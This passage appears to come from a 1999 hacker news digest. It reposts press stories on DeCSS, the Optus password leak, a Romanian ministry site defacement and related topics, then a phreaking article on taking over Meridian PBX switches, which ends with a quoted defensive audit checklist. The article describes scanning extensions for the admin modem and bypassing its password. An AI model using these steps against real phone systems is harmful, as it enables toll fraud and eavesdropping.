discs), direct DVD copying is unfeasible. But starting next year, 4.7 GB recordable DVD drives will hit the market, making duplication of DVD discs much easier. DVD uses a security method called the Content Scrambling System. CSS is a form of data encryption used to discourage reading media files directly from the disc without a decryption key. To descramble the video and audio, a 5-byte (40-bit) key is needed. Every player -- including consoles from Sony, Toshiba, and other consumer electronics vendors, as well as software vendors for PCs like WinDVD and ATI DVD -- has its own unique unlock key. Every DVD disc, in turn, has 400 of these 5-byte keys stamped onto the disc. That way, the unlock key from every licensee, be it WinDVD or a Pioneer DV-525 unit, will read the disc. All licensees of DVD technology have to encrypt their decryption key so no one can reverse-engineer the playback software and extract the key. Well, one licensee didn't encrypt their key. The developers of DeCSS, a Norwegian group called MoRE (Masters of Reverse Engineering) got a key by reverse-engineering the XingDVD player, from Xing Technologies, a subsidiary of RealNetworks. "We found that one of the companies had not encrypted their CSS decryption code, which made it very easy for us," said Jon Johansen, a founder of MoRE, in Norway. "We didn't think it would be that easy, in fact." RealNetworks did not return repeated calls requesting comment. Because the unlock key is 5 bytes long, Johansen and his two partners, who wish to remain anonymous, were able to guess a whole slew of other keys. So even if all future DVD movies remove the Xing key, DeCSS has a plethora of other keys to choose from. Johansen and his partners were able to guess more than 170 working keys by trial and error before finally just giving up to go do something else. "I wonder how much they paid for someone to actually develop that weak algorithm," said Johansen. "It's a very weak encryption algorithm." Leaving such a weak link in the security chain surprised industry people. "I am really surprised that they made it that easy to break into," said Kevin Hause, senior analyst with International Data Corp. "One of the key concerns about DVD was security." "I don't think it's the end of the world, but it'll be interesting to see what steps the industry takes now, whether they start delaying the releases of certain titles," said Bill Hunt, webmaster of The Digital Bits, a DVD news site. "I would expect it could also delay the advent of recordable DVD, because it'll give people a medium to write these hacked video files." Others aren't so talkative. The Motion Picture Association of America (MPAA) declined to comment. The DVD Forum, based in Japan, was unreachable due to a national holiday, but it did issue a carefully worded statement. "The circulation through the Internet of the illegal and inappropriate software is against the stream of copyright protection. Toshiba, which has led the establishment of the DVD format and is the chair-company of the DVD Forum, feels it is a great pity," wrote Masaki Mikura, manager of the strategic partnership and licensing division at Toshiba Ltd. "In the future, the laboratories will be more actively conducting strict surveillance and take counter measures against illegal, inappropriate software and hardware in the market. Moreover, we believe that, based on the recent legislation, legal measures and steps will be taken by copyright holders against such violation of intellectual properties," Mikura wrote. @HWA 21.0 Optus in Australia Compromised ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by DogCow Cable and Wireless Optus/Microplex in Australia suffered what they called an "unauthorized intrusion" at 4:30am AEST Nov, 3rd. According to a press release on the matter, the intruders had "limited access to details of Optus and Microplex customers [but] did not include access to any customers' financial information". Tech support staff indicated that a username/password list was posted to a Usenet group. Rumours suggest that the targeting of Optus may have been inspired by the upcoming Republic referendum in Australia, and it is unclear if the incident is related to the Cable and Wireless breach in October. Australia Broadcasting Company http://abc.net.au/news/1999/11/item19991103191554_1.htm Optus Press Release http://www.2600.org.au/advisories/optus-1199.txt ABC; Optus calls police after ISP breached One of Australia's largest Internet service providers has been forced to advise all customers to change their passwords after a major security breach was uncovered this morning. Cable and Wireless Optus called in police after what it calls "an unauthorised intrusion" into its system, but angry customers say the breach was the company's own fault. The company operates under the Optusnet, Microplex and DingoBlue banners, and a huge file containing all the login passwords was made available to anyone who wanted them. Optus says as soon as its staff were made aware of the breach, it moved to close the security loophole. However, it took the company nearly 18 hours before it alerted its 100,000 customers via an email that their passwords could no longer be considered secret and should be changed immediately. http://www.currents.net/newstoday/99/11/05/news7.html Daily News ISP Network Hacked By Adam Creed, Newsbytes. November 05, 1999 The Internet service provider (ISP) network of Australia's second largest telecommunications provider Cable & Wireless Optus Ltd [AUS:CWO] suffered a major security breach on Wednesday, with customer account details posted on the Internet. The attack occurred at 4.30am Australian Eastern Daylight Time (AEDT), with user names and passwords of OptusNet and Microplex ISP customers posted on a Usenet news group. Cable & Wireless Optus said that no customer credit card details were made available. The telco informed the police, but according to local media reports failed to alert its 100,000 or more customers that their passwords had been compromised and should be changed until 18 hours later. Commenting on the delay, Tony Hill, executive director of the Internet Society of Australia (ISOC-AU), said the Internet user group was concerned, and that Cable & Wireless Optus claimed that every effort was made to inform customers once the breach was repaired and police were notified. "ISOC-AU is concerned at reports that there may have been a delay in advising customers of the intrusion," Hill told Newsbytes. "Early advice to Internet users in this circumstance is paramount so that they can take action to protect their passwords, accounts and personal information." Cable & Wireless Optus said in a statement that it immediately closed the breach and is now reviewing and stepping up security procedures. "Although this intrusion has caused only minimal customer impact, Cable & Wireless Optus is continuing to assess the position to ensure customers are not in any way disadvantaged," said the company, in a statement.Daily News Optus press release; Optus Internet Intrusion, 3rd November, 1999 -------------------------------------------- Advisory: --------- The following Cable and Wireless press release was made available to the media on November 3rd, 1999, and is being posted here purely as a convenience given that as of 10pm AEST, it had not been made available in any "Media" or "Press Release" areas on Cable & Wireless /Optus/Microplex websites. The story had, by this stage been covered by the Australian Broadcasting Corporation and radio station 2GB in Sydney, among other outlets. The press release was finally placed on the Optus site today (4th Nov) at the following URL: http://www.cwo.com.au/company/newsArticle.asp?articleId=137 Coverage: --------- ABC: http://abc.net.au/news/1999/11/item19991103191554_1.htm SMH: http://www.smh.com.au/news/9911/04/national/national2.html Newswire: http://www.newswire.com.au/9911/breach.htm Press Release: -------------- Cable and Wireless Optus Media Statement 3 November, 1999 Optus Internet Intrusion At 4:30am today, there was an unauthorised intrusion info the Optus Internet and Microplex network. Cable and Wireless views this intrusion as a serious breach of security and has informed the police. The intrusion allowed limited access to details of Optus Internet and Microplex customers. It did not allow access to any customer's financial information. Cable and Wireless Optus took immediate action on confirmation of the breach, preventing any further access. Although this intrusion has cause only minimal customer impact, Cable and Wireless Optus is continuing to access the position to ensure customers are not in any way disadvantaged. The company is reviewing all security procedures to continue to protect the safety and integrity of customer information. Press release ends. Notice: ------- 2600 Australia has chosen to mirror this document because a number of our colleagues use Cable & Wireless / Optus / Microplex for Internet access and/or related services. It hence serves as an advisory for them in the absence of information from Cable & Wireless that details the nature of the intrusion and the size of the database of customer information exposed as a result of the breach. Document last modified: 7:21pm, 4th November, 1999 @HWA 22.0 Romanian Finance Ministry Hit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by AlienPlaque Intruders electronically broke into the Romanian Finance Ministry website, modifying and adding taxes, and changing the official exchange rate of the leu to 0.5 per dollar from 16,870 per dollar. One tax was created for 'stupidity' and some taxes where raised to 100%. The Finance Ministry is investigating "how this...was possible." C|Net http://news.cnet.com/news/0-1005-200-1427148.html?tag=st.ne.ron.lthd.1005-200-1427148 The UK Register http://www.theregister.co.uk/991102-000016.html CNET; Hackers wreak havoc on Romanian Web site By Bloomberg News Special to CNET News.com November 2, 1999, 9:35 a.m. PT BUCHAREST--Romania's Finance Ministry said it will investigate how hackers tapped into its Web site and changed tax laws and the leu's exchange rate. The Web site last weekend showed a tax on "silliness" that varied according to the importance of the taxpayer's job. For one day, the Web site said, monthly wages of as much as 1 million lei ($59.14) would be taxed 100 percent. It also changed the official exchange rate of the leu to 0.5 per dollar from 16,870 per dollar. The ministry "took immediate measures to restore the Web site's contents and will take further measures to make sure similar situations don't occur in the future," the ministry said in a statement. "The log files of our server are currently being analyzed and investigated to find out how this…was possible." Romania does not have legislation to prevent and punish Internet crime, although police have reported thousands of cases of Western companies filing complaints of Romanian hackers buying from the Internet using forged credit card numbers. Copyright 1999, Bloomberg L.P. All Rights Reserved. UK Register; Posted 02/11/99 4:10pm by Linda Harrison Hackers tax the stupid Romanian pranksters have hacked into a government Web site to levy a tax on the stupid. The group broke through top level security at the Romanian finance ministry's site to change government information. One of their alterations included placing a tax on stupidity. And the more important the person, the higher the tax. The cash collected from this would then be used to bribe NATO into accepting Romania into the fold, according to the new look Web site. Romanian officials said they had started an investigation into the security breach. A group of UK hackers were also believed to have tried a similar attempt on their own government's Central Office of Information Web site. However, they were forced to abandon the task after the site crashed repeatedly due to "hardware problems". ® @HWA 23.0 Reuters News Database Compromised ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Alexander Vorobyov from the The Russian Interior Ministry has informed the TAS news Agency that a group or individual known as Kentavr had gained illegal satellite news feeds from the Reuters News Service. Russian officials have labeled this case as the most sophisticated intellectual property crime recently committed in Russia. (Information presented here was translated from Russian so there may be some inaccuracies.) ITAR TAS http://library.northernlight.com/FC19991102530000207.html?cb=0&dx=1006&sc=0#doc Moscow hackers gain access to Reuters data base (adds) Story Filed: Tuesday, November 02, 1999 4:15 PM EST MOSCOW, November 2 (Itar-Tass) -- The Russian Interior Ministry's department for struggle against economic crime in the sphere of intellectual property has exposed a criminal group reported to have gained illegal access to the data base of Britain's Reuters news agency, press secretary of the Russian Chief Administration for Struggle against Economic Crime Alexander Vorobyov told Tass on Tuesday. The so-called Kentavr dealing centre was based on a computer class of a Moscow school. A former Reuters employee has been reported to be involved in the crime. The Russian law-enforcement bodies have already informed the British agency about Kentavr having picked the safety software locks and used the information of the agency to their own advantage. Head of the Russian department for struggle against crime in the sphere of intellectual property Mikhail Sukhodolsky told Tass that about a year ago, Kentavr had signed a contract with the economic department of Reuters, and under the contract was granted computer hardware and software, including the passwords to the agency's data base. Later, the company misappropriated the computer equipment and "disappeared" having stopped paying for the Reuters' information. Kentavr then "picked" the safety locks of the agency and gained illegal satellite-supported access to stock-exchange automated quotations and facilities of Reuters. Kentavr was reported to have rented a floor in a Moscow school. The company entered into criminal collusion with the school administration, which helped to misappropriate 40 personal computers originally bought to equip a computer class at the school. The dealing centre then advertised in the media that it would provide for low-price access to Reuters network. The police are now after natural and law persons having signed contracts with Kentavr. According to Reuters security service, the damage done by Kentavr has exceeded 3 million dollars. According to Vorobyov, the so called dealing centre had been operating without even having registered as a law person. At the same time, the law-enforcement officers were reported to have found documents providing ample evidence of the company having its own bank operating underground, and evading taxes. The Russian Interior Ministry has qualified that criminal case as a major and most sophisticated crime recently committed in Russia in the sphere of economic crimes against intellectual property. Copyright © 1999, ITAR/TASS News Agency, all rights reserved. @HWA 24.0 Taiwan Vulnerable to Cyber Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Senior officials in the Taiwanese Defense Ministry are warning that electronic threats from China and other nations will increase dramatically over the next few years. They are asking that Taiwan create a special military cyber force to repel such attacks. Associated Press http://library.northernlight.com/EC19991102930000021.html?cb=0&dx=1006&sc=0#doc Title: Taiwan Vulnerable to Cyber Attacks Summary: TAIPEI, Taiwan (AP) -- In five years, China could be able to use computer viruses, hackers and other types of cyber warfare to break down Taiwan's defenses and prepare for an invasion, the Taiwanese military said Tuesday. Source: AP Online Date: 11/02/1999 15:37 Price: Free Document Size: Very Short (0299 words) Document ID: EC19991102930000021 Subject(s): Asia Document Type: Articles & General info Taiwan Vulnerable to Cyber Attacks Story Filed: Tuesday, November 02, 1999 3:37 PM EST TAIPEI, Taiwan (AP) -- In five years, China could be able to use computer viruses, hackers and other types of cyber warfare to break down Taiwan's defenses and prepare for an invasion, the Taiwanese military said Tuesday. Taiwan's economy, government and military are highly dependent on computers and could be vulnerable to a high-tech assault, the official Central News Agency quoted Chang Jia-sheng of the Defense Ministry as saying. Chang said Taiwan should form a team of experts to prepare the island for possible cyber warfare, the agency reported. China's cyber arsenal could include computer viruses, hackers and electromagnetic pulses that would disrupt communication networks and create chaos, he said. The high-tech weapons could quickly take out their targets without much expense or loss of life, Chang said. They could destroy public morale, spread disinformation and cause instability, giving China an excuse to move in and take over the island, he said. Chang said that although China is technologically backward, it has been able to ``leap frog'' in the past and quickly acquire technology for nuclear weapons, intercontinental ballistic missiles and satellites. Acquiring the ability to use cyber warfare against Taiwan by 2005 is within China's reach, he said. China and Taiwan have been ruled by separate governments since they split during a civil war in 1949. Beijing considers the island to be a breakaway province and has repeatedly threatened to use force to reunify the two sides if Taipei seeks formal independence. Taipei has said it will gradually reunify with China once the mainland becomes democratic and more economically developed. Copyright © 1999 Associated Press Information Services, all rights reserved. @HWA 25.0 30,000 Virus Threats Received by Authorities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by standard The Gartner Group claims that the FBI and other law enforcement agencies have logged more than 30,000 threats regarding viruses to be released at the start of the new millennium. (I guess the Y2K bug is no longer sensational enough.) ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2386686,00.html?chkpt=zdhpnews01 -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Happy New Year: Y2K viruses ready By Reuters November 2, 1999 12:34 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2386686,00.html?chkpt=zdnnstop More than 30,000 threats from computer hackers and virus writers who say they will release new viruses to herald the new year and the new millennium have been logged by the FBI and other law enforcement groups, said Lou Marcoccio, worldwide research director at the technology consulting firm Gartner Group. "Most of these threats will probably amount to nothing,'' Marcoccio told Reuters after addressing a community banking industry convention in Orlando. "But if just five or 10 viruses are released at the same time, that would overwhelm the ability of ... companies that produce the fixes. It could cause substantial productivity losses.'' In the case of the Melissa virus earlier this year, most computer users, whether individuals or corporations, were able to protect their e-mail and messaging systems because code writers could replicate the virus and distribute the fixes before the virus' release date. "But these companies can't work on 10 fixes at once,'' Marcoccio said. Most computer viruses are the work of amateur hackers who are known to one another and gain status by releasing new and successful viruses, he said. Jan. 1 an appealing target The date Jan. 1, 2000, presents a very appealing target date for such viruses. "A lot of these guys don't even care if they get arrested. They just want to be remembered,'' Marcoccio said. Marcoccio was in Orlando to speak to the America's Community Bankers annual convention. He told the group that a Gartner Group survey of 14,000 people showed that 67 percent of all Americans say they plan to buy seven to 18 days of worth of food and other supplies within three days of Jan. 1. Public anxiety is way ahead of the actual Y2K threat, according to the assessment of Gartner Group researchers and most other experts. They expect computer problems to be minor, for the most part, with many Y2K problems detected in November and December of this year as date-forward transactions begin to uncover gaps in system protections. @HWA 26.0 Stupid User Mistakes (are a) Bigger Problem than Viruses ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by EvilWench A survey by Broadcasters Network International has found that accidental deletions of data cause far more problems than viruses or system crashes. CMP TechWeb http://www.techweb.com/wire/story/TWB19991029S0008 User Errors Are Key Reason For Data Loss By Mitch Wagner, InternetWeek Oct 29, 1999 (10:46 AM) URL: http://www.techweb.com/wire/story/TWB19991029S0008 Accidental deletions are the chief cause of lost data, far exceeding viruses as a cause of bygone bits, a survey found. "The vast majority of the systems managers' data loss occurs because of accidental deletions, not viruses, not systems crashes," said Phil Proffit, an analyst at Broadcasters Network International, the analyst company that conducted the research. In a sample of 300 Windows NT systems managers, 88 percent said accidental deletions were the leading cause of lost data, followed by 7 percent blaming intentional deletions, and a scant 3 percent blaming viruses. Most IT managers said they had suffered a critical loss of data as a result of an accidental deletion (69 percent). "I believe it," said Todd Dion, vice president of technology at Tutor Time, a chain of child care centers that hosts its systems on Windows NT servers. Dion said he's encountered viruses a handful of times, but lost data as a result of user error is a regular occurrence. For example, one employee in Tutor Time's accounting department regularly copies reports to a floppy and then immediately copies them back to the hard disk, and about once a month, copies the old version on the floppy over the new version on the hard disk, and, ultimately, needs rescuing. In another instance, a consultant upgrading accounting systems erased an entire folder of records and then overwrote the folder with old data. "The CFO called me in at 11:30 on Friday night, and I swear, I expected to find his hands around the consultant's throat," Dion said. While many systems managers seek to avoid such problems by routinely backing up user data, IT managers were evenly split on whether that provides complete protection against data loss. Of the 48 percent who said backups provide incomplete protection, a bit more than half said the reason is data can be lost between backups (55 percent). Another source of problems is backups are not always reliable and sometimes do not work properly (26 percent). But a good regimen of backups can minimize risk, Proffit said. IT managers should install and use backup products, such as Veritas' Backup Exec and Computer Associates' ARCserve IT. Both can be managed by the IT manager rather than trusting the user to make a backup, because the user is not likely to do it. IT managers should also install "undelete" products for NT, such as Symantec Norton Utilities 2.0 for Windows NT and Undelete for Windows NT from Executive Software. @HWA 27.0 Echelon Education Website Launched ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Lord of the Flies xechelon.org's purpose is to inform people of Echelon's existence and provide them tools and information with which they can loudly object to and thwart this pervasive government surveillance network. xechelon.org http://xechelon.org/ @HWA 28.0 FTC Says Screw You and Your Privacy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by pDick Orson Swindle, Commissioner of the FTC has said he would lead the charge to prevent regulations regarding privacy. He went on to say that the consumer should be the guard of his own privacy. (Someone needs to give this guy an education. With companies like RealNetworks ripping your information without your knowledge we need laws. How can the consumer hope to guard himself against something he does not know about?) ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2387484,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- FTC commissioner: No privacy regs By Lisa M. Bowman, ZDNN November 3, 1999 12:59 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2387484,00.html Don't expect the Federal Trade Commission to jump in anytime soon to prevent debacles such as the RealNetworks Inc. privacy snafu -- not if commissioner Orson Swindle has his way. Swindle, one of four commissioners on the agency that enforces consumer protection laws, said he would be "leading the charge" to prevent regulation regarding privacy, even though RealNetworks (Nasdaq:RNWK) angered many customers after a security expert discovered it was tracking users' music listening habits without their knowledge. "The consumer ultimately is the guard of his own privacy," said Swindle, speaking before a group of Silicon Valley attorneys at an event sponsored by law firm Wilson, Sonsini, Goodrich & Rosati in Palo Alto, Calif. "The government cannot take care of everybody." In July, the FTC approved a report recommending that Congress not regulate collection of private data, and Swindle said that stance should remain the same. "The private sector has the motivation: Good privacy practice is good business," he said. FTC regs confined to children The only Internet privacy issue the FTC has embraced so far has involved children under 13 years of age. Two weeks ago, the commission issued a set of rules that require sites to get parental permission if they want to sell or share personal information to other companies. Swindle, who's known to oppose many kinds of regulation, surprised people by jumping behind the unanimous vote supporting the new rules. However, under the guidelines, the sites still are free to collect personal information of all kinds if they only plan to use it internally. U.S. companies are facing somewhat of a conundrum as they try to do business with companies in the European Union, which holds individual privacy in much higher regard. Swindle, who was held as a POW in Vietnam for six years and also served as a spokesman during Ross Perot's 1992 presidential bid, embraces the same hands-off policy for Internet taxation that he does for privacy. During his speech he told audience members, many of them tax attorneys, that adding special taxes to Internet transactions could slow down the tech economy, which he said is "roaring like a house afire." "Any misstep on our part will have great consequences," he said. "It could literally choke off innovation." Swindle supports McCain bill The Clinton administration took a similar stance last year. In October 1998, President Clinton signed a bill that, among other things, placed a three-year moratorium on Internet taxes. In particular, Swindle said he supports a bill by presidential candidate Sen. John McCain, R-Ariz., that would permanently ban Internet sales taxes and urge the World Trade Organization to adopt a global moratorium on them. Swindle did raise concerns about privacy at one point, but he tied them to taxation. He said consumer privacy could be violated by huge databases that would be required to keep track of people's purchases as the goods that they buy move through various taxing authorities. @HWA 29.0 ParseTV to Adopt New Format ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Micheal After posting our rumor yesterday HNN received this email: "After a year and a half, Parse and its host Shamrock have parted ways. The split was amicable. Within the next few weeks, Pseudo will be launching "ParseTV.com", the digital subCULTure channel. As we prepare programming for Parsetv, we are committed to working with hosts and producers who can devote the time necessary to make Parse a top resource for hacking culture and technical information related to hacking and security. Unfortunately, Shamrock was unable to make such a commitment at this time. I myself, still believe that Shamrock has a very valuable role to play in hacker media. His outspokenness and pranks were refreshing to the community. Perhaps down the road, he might return to Parse in an undetermined role, but that will have to be worked out at some later date. Additionally, I want to state that his departure so soon after the airing of the MTV hacker show is purely coincidental." - Rinz, Producer of Parsetv.com" Parsetv.com 30.0 Meridian I hacking by BL4CKM1LK teleph0nics ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ . .. ... .......... BL4CKM1LK teleph0nics .......... ... .. . . .. ... .......... http://hybrid.dtmf.org ......... ... .. . So close it has no boundaries... A blinking cursor pulses in the electric darkness like a heart coursing with phosphorous light, burning beneath the derma of black-neon glass. A PHONE begins to RING, we hear it as though we were making the call. The cursor continues to throb, relentlessly patient, until... Meridian I Switch and Trunk Interception.......... ..... ... . An account of how an ENTIRE companys PBX.......... ..... ... . can be taken over (The hardcore phreak way)....... ..... ... . by hybrid ...... ..... ... . Hi. I'm not going to write a mad big introduction to this article, because I dont feel their is a need for one. All I want to say here is that this article is intended for the more "hardcore" phreak, yes, hardcore phreak, not for lame ass calling card leeching kiddies who call themsleves phreaks. If you are intersted in hacking telephony switches, and you have prior/prefixed knowledge of Meridian, read on.. Through my experience, I've seen alot of meridian admins go through many different and sometimes repetitive lengths to supposidly secure an internal PSTN connected PABX. In this article I'm going to share my knowledge of PBX switch hacking, and enlighten you to the intricate techneques that can be used to "trunk hop" etc. The information provided in this article has been obtained from my own personal accounts of hacking telephony switches, which I'd like to state, I don't participate in anymore. Now, for the sake of timesaving, I'll setup a possible scenario.. Consider the following: o You have stumbled accross a nice Meridian Mail system, which you have already compromised by finding yourself a few boxdes in their. You discover that the Meridian Mail system you have gained access to belongs to a certain telco, and is used for internal communication between emloyees high up in the hierarchial chain. Now, any "normal" phreak would gradually take over the system by finding as many free boxes as possible and hnading them over to friends, or would keep the nice lil' system to themselves as a means of obtaining information about the telco that owns the PBX, via the the means of eavesdroping on used voicemail boxes. This is a very primitive form of remote eavesdroping, which this file is not designed to illistrate. Meridian PBX systems are all administered by a primary system console, which can be remotely accessed by many different protocols. The most popular of which is remote dialup via assigned extensions. If the companys main switch is centrex based, it is likely that the meridian admin console is accessable via IP on the companys intranet. If you manage to gain access to the actual switching conponment, you are likely to have the following privalges on the meridian based network: o 100% control over every single inbound/outbound trunk group o Access to every single voicemail box on the switch o Access to trunk/group/node administration Basically, the meridian administration module is designed to make the admin (or whoever has access to it) GOD over the entire system, I say GOD because you could do anything you wanted, as far as your telephony derived imagination extends. OK, enough of this.. I'm just going to stop going on about what if's for the time being, now I'm going to concentrate on the factual based information, and how one would go about accessing such a switch. The simpilist way to find the internal dialup to a meridian switch is to scan the internal extensions which the switch controls. It's generaly a good idea to begin scanning network/node extensions such as 00,01,02,03[xx] etc. What you are looking for is a modem carrier, which when you connect should ask you for a singular password, which in most cases is bypassed by hitting control-SD. Once you are in, you should recieve the switches command line prompt, somthing similar to this: > or SWITCH0> OMG, I hear you think.. It looks like a DMS switch prompt.. Well, it is, in a funny kind of way. Meridian switches are designed to emualte certain levels of DMS-100 O/S types, so you'll find that many of the BCS leveled commands that you know from DMS will be usefull here. The information that follows has been obtained from public Meridian Mail Administration sources on the net.. /* Basic Meridian 1 Security Audit ------------------------------- "Users will go nuts calling a radio station to win a free toaster, taking over all the trunks in your phone system." An audit of the Meridian 1 telephone system will ensure that every possible "system" precaution has been made to prevent fraud. The first step involves querying data from the system in the form of printouts (or "capturing" the data to a file in a PC). The next step is to analyze the data and confirm the reason for each entry. Please be advised that this procedure is not designed for all "networked" Meridian 1 systems, however, most of the items apply to all systems. Use at your own risk. PRINTOUTS REQUIRED FOR SECURITY AUDIT: It is suggested that you "capture" all of the data from these printouts to separate files. This can be accomplished with a PC and communications program. For the BARS LD90 NET printout, try this file. (enclosed in faith10.zip barparse.zip) ------------------------------------------------------------------------------ LD22 CFN LD22 PWD LD21 CDB LD21 RDB LD21 LTM LD23 ACD LD24 DISA LD20 SCL LD86 ESN LD86 RLB LD86 DMI LD87 NCTL LD87 FCAS LD87 CDP LD90 NET LD90 SUM LD20 TNB LD22 DNB LD88 AUB ------------------------------------------------------------------------------ GATHERING DATA FROM LD81 ------------------------ List (LST) the following FEAT entries to form an information base on the telephones. ------------------------------------------------------------------------------ NCOS 00 99 CFXA UNR TLD SRE FRE FR1 FR2 CUN CTD ------------------------------------------------------------------------------ DATA BLOCK REVIEW ITEMS ----------------------- From the printouts, a review of the following areas must be made. Some of the items may or may not be appropriate depending on the applications of the telephone system. ------------------------------------------------------------------------------ CFN - Configuration Verify that History File is in use. ------------------------------------------------------------------------------ PWD - Passwords Verify that FLTH (failed login attempt threshold) is low enough. Verify that PWD1 and PWD2 (passwords) use both alpha and numeric characters and are eight or more characters long. Note any LAPW's (limited access passwords) assigned. Enable audit trails. ------------------------------------------------------------------------------ CDB - Customer Verify that CFTA (call forward to trunk access code) Data Block is set to NO. Verify NCOS level of console. Verify that NIT1 through NIT4 (or other night numbers) are pointing to valid numbers. EXTT prompt should be NO to work in conjunction with trunk route disconnect controls (See RDB) ------------------------------------------------------------------------------ RDB - Trunk Route Verify that every route has a TARG assigned. Confirm Data Block that FEDC and NEDC are set correctly. ETH is typical, however for maximum security in blocking trunk to trunk connections, set NEDC to ORG and FEDC to JNT Confirm that ACCD's are a minimum of four digits long (unless for paging). If ESN signaling is active on trunk routes, verify that it needs to be. ESN signaling, if not required, should be avoided. NOTES ON TGAR: For demonstration purposes, this document suggests that sets be a "TGAR 1". The only requirement for TGAR is that it match one of the TARG numbers assigned in the Route Data Block ------------------------------------------------------------------------------ ACD - Automatic Verify ACD queues and associated NCFW numbers. Call Distrobution Verify all referenced extensions. ------------------------------------------------------------------------------ DISA - Direct Remove DISA if not required. If required, verify that Inward System security codes are in use. Access ------------------------------------------------------------------------------ ESN - Electronic AC1 is typically "9". If there is an AC2 assigned, Switched Network verify its use. If TOD or ETOD is used - verify what NCOS levels are changed, when they are changed and why they are changed. Apply FLEN to your SPNs to insure nobody is ever allowed to be transferred to a partially dialed number, like "Transfer me to 91800" Study EQAR (Equal Access Restriction) to insure that users can only follow a "Carrier Access Code" with a zero rather than a one: (1010321-1-414-555-1212 is blocked but 1010321-0-414-555-1212 is allowed with EQAR) ------------------------------------------------------------------------------ NCTL - Network Use LD81 FEAT PRINT to verify all NCOS being used. Control Does NCOS 0 = FRL 0? Does NCOS X always equal FRL X in the NCTL? Does FRL 0 have any capabilities? - It should not be able to dial anything. ------------------------------------------------------------------------------ FCAS - Free Call Confirm the need to use FCAS and remove it if Screening possible. FCAS is usually a waste of system memory and complicates the system without saving money. ------------------------------------------------------------------------------ DGT (DMI) - Digit Confirm all numbers referenced in the "insert" Manipulation section of each DMI table. ------------------------------------------------------------------------------ RLB - BARS Route Are any RLB ENTR'S assigned FRL 0 - typically, only List Block the RLB that handles 911 calls should have an FRL 0. If DMI is in use, confirm all "inserted" numbers. ------------------------------------------------------------------------------ CDP - BARS Are all CDP numbers valid? Check the RLBs they point Coordinated to and see what the DMI value is. Confirm insertions. Dialing Plan ------------------------------------------------------------------------------ NET - ALL - BARS Add 000,001,002,003,004,005,006,007,008,009 as SPNs Network Numbers pointing to a route list block that is set to LTER YES. These entries block transfers to "ext. 9000" and similar numbers. Point SPN "0" to a RLI with a high FRL, then consider adding new SPNs of 02, 03, 04, 05, 06, 07, 08, 09 to point to a RLI with a lower FRL so that users cannot dial "0", but can dial "0+NPA credit card calls. Check FRL of 0, 00, 011 and confirm that each is pointed to separate NET entry requiring a high FRL. Remove all of shore NPAs (Like 1-809 Dominican Republic) if possible. Regulations are almost non-existent in some of those areas and they are hot fraud targets. Verify blocking 900 and 976 access. Also consider blocking the NXX of your local radio station contest lines. Users will go nuts calling a radio station to win a free toaster, taking over all the trunks in your phone system. Restrict the main numbers and DID range within the BARS system. There is no need to call from an outgoing to an incoming line at the same location. ------------------------------------------------------------------------------ TRUNKS Confirm that all trunks have TGAR assigned. Confirm that all incoming and TIE trunks have class of service SRE assigned. (caution on networked systems) Confirm that all trunks have an NCOS of zero. NOTES ON TGAR: For demonstration purposes, this document suggests that sets be a "TGAR 1". The only requirement for TGAR is that it match one of the TARG numbers assigned in the Route Data Block ------------------------------------------------------------------------------ SETS-PHONES Does every phone have a TGAR of 1 assigned? (This must be checked set by set, TN by TN). Can you change every phone that is UNR to CTD? Review LD81 FEAT PRINT to find out the UNR sets. CTD class of service is explained below. Confirm that all sets are assigned CLS CFXD? Confirm that the NCOS is appropriate on each set. In Release 20 or above, removing transfer feature may be appropriate. Confirm that all sets CFW digit length is set to the system DN length. NOTES ON TGAR: For demonstration purposes, this document suggests that sets be a "TGAR 1". The only requirement for TGAR is that it match one of the TARG numbers assigned in the Route Data Block Apply Flexible Trunk to Trunk Connections on the set, and FTOP in the CDB if deemed appropriate. These restrictions are done on a set by set basis and allow or deny the ability to transfer incoming calls out of the facility. ------------------------------------------------------------------------------ VOICE MAIL PORTS Each port should be CLS of SRE Each port should be NCOS 0 - NCOS 0 must be known to be too low to pass any call Each port should be TGAR 1 (all trunk routes must be TARG 1 also) NOTES ON TGAR: For demonstration purposes, this document suggests that sets be a "TGAR 1". The only requirement for TGAR is that it match one of the TARG numbers assigned in the Route Data Block NOTE: If you are used to your Mail system doing outcalling, you can forget about that working after applying these restrictions. ------------------------------------------------------------------------------ CLASS OF SERVICE AND TRUNK GROUP ACCESS RESTRICTIONS: ----------------------------------------------------- EXPLANATION OF CLASS OF SERVICE SRE: ------------------------------------ NTP DEFINITION: Allowed to receive calls from the exchange network. Restricted from all dial access to the exchange network. Allowed to access the exchange network through an attendant or an unrestricted telephone only. Essentially, an SRE set can do nothing on it's own except dial internal and TIE line extensions. If a trunk is SRE - it will work normally and allow conference calls and transfers. EXAMPLES OF 'SRE' IN USE: ------------------------- Voice Mail cannot connect to an outgoing line, but can receive incoming calls. Callers on the far end of a TIE line cannot call out through your end (for their sake, both ends should be SRE). EXPLANATION OF CLASS OF SERVICE CTD: ------------------------------------ If a route access code is accessed (if there was no match between the TGAR and TARG), the caller cannot dial 1 or 0 as the leading digits. If the caller makes a "dial 9" BARS call, the NCOS will control the call. EXPLANATION OF 